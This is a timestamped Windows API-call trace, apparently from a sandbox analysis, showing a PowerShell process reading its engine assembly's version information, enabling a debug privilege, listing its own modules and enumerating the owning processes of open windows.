	[0277.320] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2c172d8 | out: lpData=0x2c172d8) returned 1
	[0277.322] VerQueryValueW (in: pBlock=0x2c172d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1cde58, puLen=0x1cde50 | out: lplpBuffer=0x1cde58*=0x2c17374, puLen=0x1cde50) returned 1
	[0277.747] lstrlenW (lpString="䅁") returned 1
	[0277.758] VerQueryValueW (in: pBlock=0x2c172d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x1cddc8, puLen=0x1cddc0 | out: lplpBuffer=0x1cddc8*=0x2c17450, puLen=0x1cddc0) returned 1
	[0277.759] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0277.762] CoTaskMemAlloc (cb=0x2e) returned 0x3c0c40
	[0277.762] lstrcpyW (in: lpString1=0x3c0c40, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0277.764] CoTaskMemFree (pv=0x3c0c40) 
	[0277.764] VerQueryValueW (in: pBlock=0x2c172d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x1cddc8, puLen=0x1cddc0 | out: lplpBuffer=0x1cddc8*=0x2c174a4, puLen=0x1cddc0) returned 1
	[0277.764] lstrlenW (lpString="System.Management.Automation") returned 28
	[0277.764] CoTaskMemAlloc (cb=0x3c) returned 0x334600
	[0277.764] lstrcpyW (in: lpString1=0x334600, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0277.764] CoTaskMemFree (pv=0x334600) 
	[0277.764] VerQueryValueW (in: pBlock=0x2c172d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x1cddc8, puLen=0x1cddc0 | out: lplpBuffer=0x1cddc8*=0x2c17500, puLen=0x1cddc0) returned 1
	[0277.764] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0277.764] CoTaskMemAlloc (cb=0x20) returned 0x3bea00
	[0277.764] lstrcpyW (in: lpString1=0x3bea00, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0277.764] CoTaskMemFree (pv=0x3bea00) 
	[0277.764] VerQueryValueW (in: pBlock=0x2c172d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x1cddc8, puLen=0x1cddc0 | out: lplpBuffer=0x1cddc8*=0x2c17540, puLen=0x1cddc0) returned 1
	[0277.764] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0277.764] CoTaskMemAlloc (cb=0x44) returned 0x334600
	[0277.765] lstrcpyW (in: lpString1=0x334600, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0277.765] CoTaskMemFree (pv=0x334600) 
	[0277.765] VerQueryValueW (in: pBlock=0x2c172d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x1cddc8, puLen=0x1cddc0 | out: lplpBuffer=0x1cddc8*=0x2c175a8, puLen=0x1cddc0) returned 1
	[0277.765] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0277.765] CoTaskMemAlloc (cb=0x76) returned 0x367790
	[0277.765] lstrcpyW (in: lpString1=0x367790, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0277.765] CoTaskMemFree (pv=0x367790) 
	[0277.765] VerQueryValueW (in: pBlock=0x2c172d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x1cddc8, puLen=0x1cddc0 | out: lplpBuffer=0x1cddc8*=0x2c17644, puLen=0x1cddc0) returned 1
	[0277.765] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0277.765] CoTaskMemAlloc (cb=0x44) returned 0x334600
	[0277.765] lstrcpyW (in: lpString1=0x334600, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0277.765] CoTaskMemFree (pv=0x334600) 
	[0277.765] VerQueryValueW (in: pBlock=0x2c172d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x1cddc8, puLen=0x1cddc0 | out: lplpBuffer=0x1cddc8*=0x2c176a8, puLen=0x1cddc0) returned 1
	[0277.765] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0277.765] CoTaskMemAlloc (cb=0x58) returned 0x315f60
	[0277.765] lstrcpyW (in: lpString1=0x315f60, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0277.765] CoTaskMemFree (pv=0x315f60) 
	[0277.765] VerQueryValueW (in: pBlock=0x2c172d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x1cddc8, puLen=0x1cddc0 | out: lplpBuffer=0x1cddc8*=0x2c17724, puLen=0x1cddc0) returned 1
	[0277.765] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0277.765] CoTaskMemAlloc (cb=0x20) returned 0x3bea00
	[0277.765] lstrcpyW (in: lpString1=0x3bea00, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0277.765] CoTaskMemFree (pv=0x3bea00) 
	[0277.766] VerQueryValueW (in: pBlock=0x2c172d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x1cddc8, puLen=0x1cddc0 | out: lplpBuffer=0x1cddc8*=0x2c173cc, puLen=0x1cddc0) returned 1
	[0277.766] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0277.766] CoTaskMemAlloc (cb=0x66) returned 0x3b0e50
	[0277.766] lstrcpyW (in: lpString1=0x3b0e50, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0277.766] CoTaskMemFree (pv=0x3b0e50) 
	[0277.766] VerQueryValueW (in: pBlock=0x2c172d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x1cddc8, puLen=0x1cddc0 | out: lplpBuffer=0x1cddc8*=0x0, puLen=0x1cddc0) returned 0
	[0277.766] VerQueryValueW (in: pBlock=0x2c172d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x1cddc8, puLen=0x1cddc0 | out: lplpBuffer=0x1cddc8*=0x0, puLen=0x1cddc0) returned 0
	[0277.766] VerQueryValueW (in: pBlock=0x2c172d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x1cddc8, puLen=0x1cddc0 | out: lplpBuffer=0x1cddc8*=0x0, puLen=0x1cddc0) returned 0
	[0277.766] VerQueryValueW (in: pBlock=0x2c172d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1cdd98, puLen=0x1cdd90 | out: lplpBuffer=0x1cdd98*=0x2c17374, puLen=0x1cdd90) returned 1
	[0277.767] CoTaskMemAlloc (cb=0x204) returned 0x35c890
	[0277.767] VerLanguageNameW (in: wLang=0x0, szLang=0x35c890, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0277.769] CoTaskMemFree (pv=0x35c890) 
	[0277.769] VerQueryValueW (in: pBlock=0x2c172d8, lpSubBlock="\\", lplpBuffer=0x1cdde8, puLen=0x1cdde0 | out: lplpBuffer=0x1cdde8*=0x2c17300, puLen=0x1cdde0) returned 1
	[0277.775] GetCurrentProcessId () returned 0x9fc
	[0278.184] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x1ccd10 | out: lpLuid=0x1ccd10*(LowPart=0x14, HighPart=0)) returned 1
	[0278.187] GetCurrentProcess () returned 0xffffffffffffffff
	[0278.188] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x1ccd30 | out: TokenHandle=0x1ccd30*=0x2ec) returned 1
	[0278.189] AdjustTokenPrivileges (in: TokenHandle=0x2ec, DisableAllPrivileges=0, NewState=0x2c1ab50*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0278.190] CloseHandle (hObject=0x2ec) returned 1
	[0278.194] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9fc) returned 0x2ec
	[0278.203] EnumProcessModules (in: hProcess=0x2ec, lphModule=0x2c1abb8, cb=0x200, lpcbNeeded=0x1cdd48 | out: lphModule=0x2c1abb8, lpcbNeeded=0x1cdd48) returned 1
	[0278.205] GetModuleInformation (in: hProcess=0x2ec, hModule=0x13f370000, lpmodinfo=0x2c1ae28, cb=0x18 | out: lpmodinfo=0x2c1ae28*(lpBaseOfDll=0x13f370000, SizeOfImage=0x77000, EntryPoint=0x13f37c63c)) returned 1
	[0278.206] CoTaskMemAlloc (cb=0x804) returned 0x3c8d50
	[0278.208] GetModuleBaseNameW (in: hProcess=0x2ec, hModule=0x13f370000, lpBaseName=0x3c8d50, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0278.208] CoTaskMemFree (pv=0x3c8d50) 
	[0278.209] CoTaskMemAlloc (cb=0x804) returned 0x3c8d50
	[0278.209] GetModuleFileNameExW (in: hProcess=0x2ec, hModule=0x13f370000, lpFilename=0x3c8d50, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0278.210] CoTaskMemFree (pv=0x3c8d50) 
	[0278.210] CloseHandle (hObject=0x2ec) returned 1
	[0278.218] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x9fc) returned 0x2ec
	[0278.219] GetExitCodeProcess (in: hProcess=0x2ec, lpExitCode=0x1cde78 | out: lpExitCode=0x1cde78*=0x103) returned 1
	[0278.228] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12c1b088, Length=0x20000, ResultLength=0x1cde40 | out: SystemInformation=0x12c1b088, ResultLength=0x1cde40*=0x13470) returned 0x0
	[0278.771] EnumWindows (lpEnumFunc=0x21e66ac, lParam=0x0) returned 1
	[0279.533] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x4d0
	[0279.534] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x558
	[0279.534] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x4d0
	[0279.534] GetWindowThreadProcessId (in: hWnd=0x300fe, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x4d0
	[0279.534] GetWindowThreadProcessId (in: hWnd=0x400ae, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x4d0
	[0279.534] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x538
	[0279.534] GetWindowThreadProcessId (in: hWnd=0x20118, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x4d0
	[0279.534] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x778
	[0279.534] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x778
	[0279.534] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x4d0
	[0279.534] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x4d0
	[0279.535] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x4d0
	[0279.535] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x4d0
	[0279.535] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x4d0
	[0279.535] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x4d0
	[0279.535] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x4d0
	[0279.535] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x4d0
	[0279.535] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x460
	[0279.535] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x4d0
	[0279.535] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x4d0
	[0279.535] GetWindowThreadProcessId (in: hWnd=0x30298, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0xac0
	[0279.535] GetWindowThreadProcessId (in: hWnd=0x2029a, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0xab4
	[0279.536] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0xaac
	[0279.536] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x3d0
	[0279.536] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x978
	[0279.536] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0xa7c
	[0279.536] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x59c
	[0279.536] GetWindowThreadProcessId (in: hWnd=0x20212, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0xa88
	[0279.536] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0xa6c
	[0279.536] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0xa68
	[0279.536] GetWindowThreadProcessId (in: hWnd=0x20206, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x9f8
	[0279.537] GetWindow (hWnd=0x20206, uCmd=0x4) returned 0x0
	[0279.538] IsWindowVisible (hWnd=0x20206) returned 0
	[0279.538] GetWindowThreadProcessId (in: hWnd=0x20204, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0xa04
	[0279.538] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x924
	[0279.538] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x8dc
	[0279.538] GetWindowThreadProcessId (in: hWnd=0x201ec, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x7dc
	[0279.539] GetWindowThreadProcessId (in: hWnd=0x301d6, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x768
	[0279.539] GetWindowThreadProcessId (in: hWnd=0x301e0, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x764
	[0279.539] GetWindowThreadProcessId (in: hWnd=0x201e4, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x820
	[0279.539] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x810
	[0279.539] GetWindowThreadProcessId (in: hWnd=0x301f2, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x794
	[0279.539] GetWindowThreadProcessId (in: hWnd=0x401b6, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x83c
	[0279.539] GetWindowThreadProcessId (in: hWnd=0x501be, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x7ac
	[0279.539] GetWindowThreadProcessId (in: hWnd=0x160162, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0xb44
	[0279.540] GetWindowThreadProcessId (in: hWnd=0x500ea, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0xb5c
	[0279.540] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x838
	[0279.540] GetWindowThreadProcessId (in: hWnd=0x800a8, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x4d0
	[0279.540] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x4d0
	[0279.540] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x4d0
	[0279.540] GetWindowThreadProcessId (in: hWnd=0x300d2, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x4d0
	[0279.540] GetWindowThreadProcessId (in: hWnd=0x300ce, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x4d0
	[0279.540] GetWindowThreadProcessId (in: hWnd=0x300d8, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x4d0
	[0279.540] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x4d0
	[0279.540] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x4d0
	[0279.541] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x818
	[0279.541] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x5b8
	[0279.541] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x494
	[0279.541] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x1ec
	[0279.541] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x440
	[0279.541] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x7e8
	[0279.541] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x730
	[0279.541] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x2c8
	[0279.542] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x31c
	[0279.542] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x330
	[0279.543] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x128
	[0279.543] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x5c8
	[0279.543] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x6f8
	[0279.543] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x358
	[0279.543] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x73c
	[0279.543] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0xb0
	[0279.543] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x250
	[0279.543] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x240
	[0279.543] GetWindowThreadProcessId (in: hWnd=0x2015e, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x790
	[0279.544] GetWindowThreadProcessId (in: hWnd=0x40112, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x61c
	[0279.544] GetWindowThreadProcessId (in: hWnd=0x3015a, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x540
	[0279.544] GetWindowThreadProcessId (in: hWnd=0x10150, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x538
	[0279.544] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x568
	[0279.544] GetWindowThreadProcessId (in: hWnd=0x20144, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x538
	[0279.544] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x568
	[0279.544] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x538
	[0279.544] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x540
	[0279.545] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x540
	[0279.545] GetWindowThreadProcessId (in: hWnd=0x1010e, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x510
	[0279.545] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x57c
	[0279.545] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x460
	[0279.545] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x554
	[0279.545] GetWindowThreadProcessId (in: hWnd=0x50094, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x4d0
	[0279.545] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x528
	[0279.545] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x4d0
	[0279.546] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x4d0
	[0279.546] GetWindowThreadProcessId (in: hWnd=0x1006e, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x4d0
	[0279.546] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x79c
	[0279.546] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x4d0
	[0279.546] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x4e0
	[0279.546] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x4d0
	[0279.546] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x460
	[0279.546] GetWindowThreadProcessId (in: hWnd=0x20046, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x460
	[0279.546] GetWindowThreadProcessId (in: hWnd=0x30044, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x44c
	[0279.547] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x778
	[0279.547] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x460
	[0279.547] GetWindowThreadProcessId (in: hWnd=0x30140, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x558
	[0279.547] GetWindowThreadProcessId (in: hWnd=0x1005c, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x4d0
	[0279.547] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x4d0
	[0279.547] GetWindowThreadProcessId (in: hWnd=0x102aa, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0xa8c
	[0279.547] GetWindowThreadProcessId (in: hWnd=0x202a0, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x46c
	[0279.547] GetWindowThreadProcessId (in: hWnd=0x10264, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0xb3c
	[0279.548] GetWindowThreadProcessId (in: hWnd=0x10254, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0xa90
	[0279.548] GetWindowThreadProcessId (in: hWnd=0x10244, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0xad0
	[0279.548] GetWindowThreadProcessId (in: hWnd=0x1022a, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0xa9c
	[0279.548] GetWindowThreadProcessId (in: hWnd=0x10226, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0xaa0
	[0279.548] GetWindowThreadProcessId (in: hWnd=0x10222, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0xb1c
	[0279.548] GetWindowThreadProcessId (in: hWnd=0x1021e, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x7e0
	[0279.548] GetWindowThreadProcessId (in: hWnd=0x10216, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0xa74
	[0279.548] GetWindowThreadProcessId (in: hWnd=0x20208, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x694
	[0279.548] GetWindowThreadProcessId (in: hWnd=0x401f0, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0xa28
	[0279.549] GetWindowThreadProcessId (in: hWnd=0x1020c, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x9b0
	[0279.549] GetWindowThreadProcessId (in: hWnd=0x10202, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x8d8
	[0279.549] GetWindowThreadProcessId (in: hWnd=0x201ca, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x940
	[0279.549] GetWindowThreadProcessId (in: hWnd=0x201d8, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x93c
	[0279.549] GetWindowThreadProcessId (in: hWnd=0x301e2, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x4ec
	[0279.549] GetWindowThreadProcessId (in: hWnd=0x201de, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x150
	[0279.549] GetWindowThreadProcessId (in: hWnd=0x201c8, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x720
